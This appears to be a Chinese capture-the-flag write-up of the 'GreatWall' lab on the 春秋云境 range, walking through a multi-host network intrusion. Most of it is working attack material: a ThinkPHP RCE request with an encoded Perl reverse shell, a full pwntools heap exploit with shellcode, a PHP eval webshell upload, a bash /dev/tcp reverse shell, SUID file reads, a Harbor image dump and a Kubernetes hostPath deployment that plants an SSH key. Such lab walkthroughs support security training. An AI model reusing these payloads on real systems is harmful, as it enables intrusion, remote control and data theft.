春秋云境-GreatWall

入口:39.101.76.98

扫下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
[2025-03-04 18:33:08] [INFO] 暴力破解线程数: 1
[2025-03-04 18:33:08] [INFO] 开始信息扫描
[2025-03-04 18:33:08] [INFO] 最终有效主机数量: 1
[2025-03-04 18:33:08] [INFO] 开始主机扫描
[2025-03-04 18:33:09] [INFO] 有效端口数量: 233
[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:80
[2025-03-04 18:33:09] [SUCCESS] 端口开放 39.101.76.98:22
[2025-03-04 18:33:09] [SUCCESS] 服务识别 39.101.76.98:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:33:11] [SUCCESS] 端口开放 39.101.76.98:8080
[2025-03-04 18:33:14] [SUCCESS] 服务识别 39.101.76.98:80 => [http]
[2025-03-04 18:33:14] [SUCCESS] 服务识别 39.101.76.98:8080 => [http]
[2025-03-04 18:33:16] [INFO] 存活端口数量: 3
[2025-03-04 18:33:16] [INFO] 开始漏洞扫描
[2025-03-04 18:33:16] [INFO] 加载的插件: ssh, webpoc, webtitle
[2025-03-04 18:33:16] [SUCCESS] 网站标题 http://39.101.76.98 状态码:200 长度:10887 标题:""
[2025-03-04 18:33:17] [SUCCESS] 网站标题 http://39.101.76.98:8080 状态码:200 长度:1027 标题:Login Form
[2025-03-04 18:33:35] [SUCCESS] 目标: http://39.101.76.98:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc2
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

TP5.0.23RCE

vulhub/thinkphp/5.0.23-rce at master · vulhub/vulhub

1
2
3
4
5
6
7
8
9
10
11
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

反弹 shell:

1
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=perl%20-MIO%20-e%20%27%24p%3Dfork%3Bexit%2Cif%28%24p%29%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET%28PeerAddr%2C%221xxx8%3A8088%22%29%3BSTDIN-%3Efdopen%28%24c%2Cr%29%3B%24~-%3Efdopen%28%24c%2Cw%29%3Bsystem%24_%20while%3C%3E%3B%27

vshell 一键上线。

PWN

172 段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
[2025-03-04 18:47:07] [INFO] 暴力破解线程数: 1
[2025-03-04 18:47:07] [INFO] 开始信息扫描
[2025-03-04 18:47:07] [INFO] CIDR范围: 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] 生成IP范围: 172.28.23.0.%!d(string=172.28.23.255) - %!s(MISSING).%!d(MISSING)
[2025-03-04 18:47:07] [INFO] 解析CIDR 172.28.23.17/24 -> IP范围 172.28.23.0-172.28.23.255
[2025-03-04 18:47:07] [INFO] 最终有效主机数量: 256
[2025-03-04 18:47:07] [INFO] 开始主机扫描
[2025-03-04 18:47:07] [INFO] 正在尝试无监听ICMP探测...
[2025-03-04 18:47:07] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-03-04 18:47:07] [INFO] 切换为PING方式探测...
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.26 存活 (ICMP)
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.17 存活 (ICMP)
[2025-03-04 18:47:07] [SUCCESS] 目标 172.28.23.33 存活 (ICMP)
[2025-03-04 18:47:13] [INFO] 存活主机数量: 3
[2025-03-04 18:47:13] [INFO] 有效端口数量: 233
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.33:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:21
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:22
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.26:80
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:80
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.17:8080
[2025-03-04 18:47:13] [SUCCESS] 端口开放 172.28.23.33:8080
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.33:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.10.]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.26:22 => [ssh] 版本:7.2p2 Ubuntu 4ubuntu2.10 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10.]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.26:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-03-04 18:47:13] [SUCCESS] 服务识别 172.28.23.17:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.7 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.7.]
[2025-03-04 18:47:19] [SUCCESS] 服务识别 172.28.23.17:8080 => [http]
[2025-03-04 18:47:19] [SUCCESS] 服务识别 172.28.23.33:8080 => [http]
[2025-03-04 18:47:20] [SUCCESS] 服务识别 172.28.23.17:80 => [http]
[2025-03-04 18:47:20] [SUCCESS] 服务识别 172.28.23.26:80 => [http]
[2025-03-04 18:47:20] [INFO] 存活端口数量: 8
[2025-03-04 18:47:20] [INFO] 开始漏洞扫描
[2025-03-04 18:47:20] [INFO] 加载的插件: ftp, ssh, webpoc, webtitle
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.17 状态码:200 长度:10887 标题:""
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.17:8080 状态码:200 长度:1027 标题:Login Form
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.26 状态码:200 长度:13693 标题:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413
[2025-03-04 18:47:20] [SUCCESS] 匿名登录成功!
[2025-03-04 18:47:20] [SUCCESS] 网站标题 http://172.28.23.33:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5
[2025-03-04 18:47:21] [SUCCESS] 网站标题 http://172.28.23.33:8080/login;jsessionid=F926A750A2597E0C56DBD301AA0F75E5 状态码:200 长度:3860 标题:智联科技 ERP 后台登陆
[2025-03-04 18:47:21] [SUCCESS] 目标: http://172.28.23.17:8080
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-03-04 18:47:22] [SUCCESS] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-03-04 18:47:22] [SUCCESS] 目标: http://172.28.23.33:8080
漏洞类型: poc-yaml-springboot-env-unauth
漏洞名称: spring2
详细信息:
links:https://github.com/LandGrey/SpringBootVulExploit

heapdump 泄露 拉出个隧道

1
2
3
4
5
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = AZYyIgMYhG6/CzIJlvpR2g==, algName = AES

godzilla 上内存马链接下载 hashnote,大头的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
from pwn import *

elf = ELF('./HashNote')
context(arch=elf.arch, os='linux', log_level='debug')
# p = process('./HashNote')

p = remote('172.28.23.33', 59696)

def send_command(command):
p.sendlineafter(': ', str(command))

def add_entry(key, value):
send_command(1)
p.sendlineafter('Key: ', key)
p.sendlineafter('Data: ', value)

def get_entry(key):
send_command(2)
p.sendlineafter('Key: ', key)

def update_entry(key, value):
send_command(3)
p.sendlineafter('Key: ', key)
p.sendlineafter('Data: ', value)

def set_username(value):
send_command(4)
p.sendafter('New username: ', value)

p.sendlineafter('Username: ', '123')
p.sendlineafter('Password: ', 'freep@ssw0rd:3')

add_entry('aabP', 'aaaaaaaa')
add_entry('aace', 'C' * 0xc0)

sc = [
'\x6a\x3b', # push 0x3b
'\x58', # pop rax
'\x99', # cdq
'\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68', # movabs rbx, 0x68732f6e69622f2f
'\x53', # push rbx
'\x48\x89\xe7', # mov rdi, rsp
'\x52', # push rdx
'\x57', # push rdi
'\x48\x89\xe6', # mov rsi, rsp
'\x0f\x05' # syscall
]
shellcode = b''.join(sc)
username_addr = 0x5dc980
fake_obj_addr = username_addr + 0x10

def arbitrary_read(addr):
payload = p64(fake_obj_addr)
payload += p64(0xdeadbeef)

fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
fake_obj += 'aahO'.ljust(0x10, '\x00')
fake_obj += p64(addr) + p64(8) + 'aaaaaaaa'

payload += fake_obj
payload += shellcode
payload = payload.ljust(128, '\x00')
set_username(payload)
get_entry('aahO')

# 任意读/写函数
def arbitrary_write(addr, data):
payload = p64(fake_obj_addr)
payload += p64(0xdeadbeef)

fake_obj = p64(fake_obj_addr + 0x10) + p64(4)
fake_obj += 'aahO'.ljust(0x10, '\x00')
fake_obj += p64(addr) + p64(len(data)) + 'aaaaaaaa'

payload += fake_obj
payload += shellcode
payload = payload.ljust(128, '\x00')
set_username(payload)
update_entry('aahO', data)

environ = 0x5e4c38
arbitrary_read(environ)
stack_addr = u64((p.recvuntil('\x7f', drop=False)[-6:].ljust(8, '\0')))
success('stack_addr', stack_addr)

rdi = 0x0000000000405e7c
rsi = 0x000000000040974f
rax = 0x00000000004206ba
rdx_rbx = 0x000000000053514b
shr_eax_2 = 0x0000000000523f2e
syscall_ret = 0x00000000004d9776

payload = p64(rdi) + p64(username_addr & ~0xfff) + p64(rsi) + p64(0x1000) + p64(rdx_rbx) + p64(7) + p64(0) + p64(rax) + p64(0xa << 2) + p64(shr_eax_2) + p64(syscall_ret) + p64(username_addr + 0x48)

arbitrary_write(stack_addr - 0x210, payload)
p.sendline('uname -ar')

p.interactive()

Disable_function\suid 提权

ftp 这个有个坑

本地不知道为什么不行

1
2
http://172.28.23.26/uploadbase64.php
imgbase64=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B

有 disable_funtion 蚂蚁的剑插件绕过下。

这里不能用 post 的马,需要上传一个 get 的马,然后在.antproxy.php中修改为 get 的马。

执行

没权限读取 flag 需要 suid 提权。

1
2
find / -xdev -type f -perm /4000 -exec ls -al {} \; 2> /dev/null
find / -perm -u=s -type f 2>/dev/null
1
/bin/fusermount /bin/ping6 /bin/mount /bin/su /bin/ping /bin/umount /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd /usr/bin/at /usr/bin/staprun /usr/bin/base32 /usr/bin/passwd /usr/bin/chsh /usr/bin/sudo /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/openssh/ssh-keysign /usr/lib/eject/dmcrypt-get-device /usr/lib/s-nail/s-nail-privsep

可以用 base32 来获取 flag。

1
http://172.28.23.26/upload/.antproxy.php?1=system("base32 /fla* | base32 --decode");

Harbor 未授权

用的 gost 做的流量转发把 shell 弹出去,再用 stowaway 和前面节点连接起来。

1
2
3
./gost -L tcp://:18080/1xxx68:8096

http://172.28.23.26/upload/.antproxy.php?1=system(%22bash%20-c%20%5C%22%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.28.23.17%2F18080%200%3E%261%5C%22%22)%3B

stowaway

1
./linux_x64_agent -c 1xxx8:8096 -s 1234 --reconnect 8
1
curl http://172.28.23.17:7779/linux_x64_agent -o /tmp/linux_x64_agent

fscan 一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[2025-03-04 21:29:51] [HOST] 目标:172.22.14.6 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:51] [HOST] 目标:172.22.14.37 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:51] [HOST] 目标:172.22.14.46 状态:alive 详情:protocol=ICMP
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.46 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.46 状态:identified 详情:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.11., port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.11, product=OpenSSH
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=80
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.37 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.37 状态:identified 详情:os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.7., port=22, service=ssh, version=7.6p1 Ubuntu 4ubuntu0.7, product=OpenSSH
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=22
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.6 状态:identified 详情:banner=SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10., port=22, service=ssh, version=7.2p2 Ubuntu 4ubuntu2.10, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.6 状态:open 详情:port=21
[2025-03-04 21:29:57] [SERVICE] 目标:172.22.14.6 状态:identified 详情:port=21, service=ftp, version=3.0.3, product=vsftpd, os=Unix, banner=220 (vsFTPd 3.0.3).
[2025-03-04 21:29:57] [PORT] 目标:172.22.14.46 状态:open 详情:port=80
[2025-03-04 21:30:02] [SERVICE] 目标:172.22.14.46 状态:identified 详情:port=80, service=http, product=nginx
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.6 状态:identified 详情:port=80, service=http
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.46 状态:identified 详情:url=http://172.22.14.46, status_code=200, length=785, server_info=map[accept-ranges:bytes cache-control:no-store, no-cache, must-revalidate content-length:785 content-security-policy:frame-ancestors 'none' content-type:text/html date:Tue, 04 Mar 2025 13:30:03 GMT etag:"65f177f2-311" last-modified:Wed, 13 Mar 2024 09:54:58 GMT length:785 server:nginx status_code:200 title:Harbor x-frame-options:DENY], fingerprints=[], port=80, service=http, title=Harbor
[2025-03-04 21:30:03] [SERVICE] 目标:172.22.14.6 状态:identified 详情:length=13693, server_info=map[content-type:text/html;charset=utf-8 date:Tue, 04 Mar 2025 13:30:03 GMT length:13693 server:Apache/2.4.18 (Ubuntu) status_code:200 title:新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413 vary:Accept-Encoding], fingerprints=[], port=80, service=http, title=新翔OA管理系统-OA管理平台联系电话:13849422648微信同号,QQ958756413, url=http://172.22.14.6, status_code=200
[2025-03-04 21:30:03] [VULN] 目标:172.22.14.6 状态:vulnerable 详情:username=anonymous, password=, type=anonymous-login, directories=[OASystem.zip], port=21, service=ftp

CVE-2022-46463

harbor 未授权

GitHub - 404tk/CVE-2022-46463: harbor unauthorized detection

下载镜像。

1
python .\harbor.py http://172.22.14.46/ --dump harbor/secret --v2
1
2
cd ./caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
cat f1ag05_Yz1o.txt

然后再拉取project_projectadmin,其中的 run.sh 运行了 ProjectAdmin-0.0.1-SNAPSHOT.jar

1
caches\project_projectadmin\latest\ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c\app\ProjectAdmin-0.0.1-SNAPSHOT.jar

反编译里面有数据库账号密码,连接上去之后 mdut。

这个用 mdut-extend 不行 但是原版就可以,很奇怪。

K8S

k8s-api-server

最后这个环境有问题 搞了几次都有问题。

整个 evil-deployment.yaml 将宿主机目录挂载到容器内部的/mnt。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-deployment
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
template:
metadata:
labels:
app: nginx
spec:
containers:
- name: nginx
image: nginx:1.8
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
path: /

创建 pod、get 获取 pod,exec 后写 SSH 公钥到 authorized_keys 中。再 SSH 连接。flag 在数据库里面,base 解码一下。

1
2
3
4
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f evil-deployment.yaml
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it nginx-deployment-864f8bfd6f-7pzlq /bin/bash
echo "ssh-rsa AAAxx= root@kali" > /mnt/root/.ssh/authorized_keys
1
ssh -i /home/kali/.ssh/id_rsa root@172.22.14.37
1
2
use flaghaha;
select * from flag04;